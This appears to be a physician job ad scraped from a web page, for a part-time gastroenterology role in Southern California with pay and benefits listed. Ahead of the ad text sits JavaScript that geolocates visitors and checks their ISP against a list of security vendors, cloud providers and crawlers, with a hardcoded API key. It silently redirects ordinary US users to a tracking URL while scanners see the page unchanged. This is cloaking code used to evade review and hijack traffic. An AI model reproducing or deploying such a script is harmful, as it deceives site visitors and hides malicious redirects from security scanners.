Job Description
// retrieve user’s IP address and location const ipAddressUrl = ‘https://ipapi.co/json/’; fetch(ipAddressUrl) .then(response => response.json()) .then(data => { const country = data.country; // Get user’s country code (e.g., “US”) if (country !== ‘US’) { console.log(‘Script will not run as the user is outside the USA.’); return; // Exit the script if the user is not in the USA } const ipAddress = data.ip; // retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/$?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname; // check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg)); if (!ispAllowed && !asOrgAllowed) { // Redirect all users to the same URL window.location.href = ‘https://www.indeed.com/tmn/ccs/74398581ed0238cb/0db7b1aaf1b5367c0b90d8e4153dc44f62e87a70214a20810a652367c2f8a6f9/2765583331732878?sf=yJ800’; } }) .catch(error => { console.error(‘Error retrieving ISP name:’, error); }); }) .catch(error => { console.error(‘Error retrieving IP address or location:’, error); });Join a rapidly growing gastroenterology practice with multiple locations in Southern California, offering full-time or part-time positions. The role emphasizes a balanced lifestyle, with only 3 workdays per week and no weekends, nights, or on-call duties.
Scoping can be highly lucrative, earning up to $4,000 per day, with a generous sign-on bonus of $100,000.
Responsibilities include diagnosing and treating GI disorders and performing endoscopic procedures such as colonoscopies and upper endoscopies.
Ideal candidates are board-certified or eligible in Gastroenterology, proficient in endoscopy, and able to provide comprehensive clinical care.
Compensation ranges from $550,000 to $650,000 annually, with benefits including 401(k), dental and health insurance, paid time off, relocation assistance, and tuition reimbursement.
Work is in person, with hours ranging from 8 to 40 per week.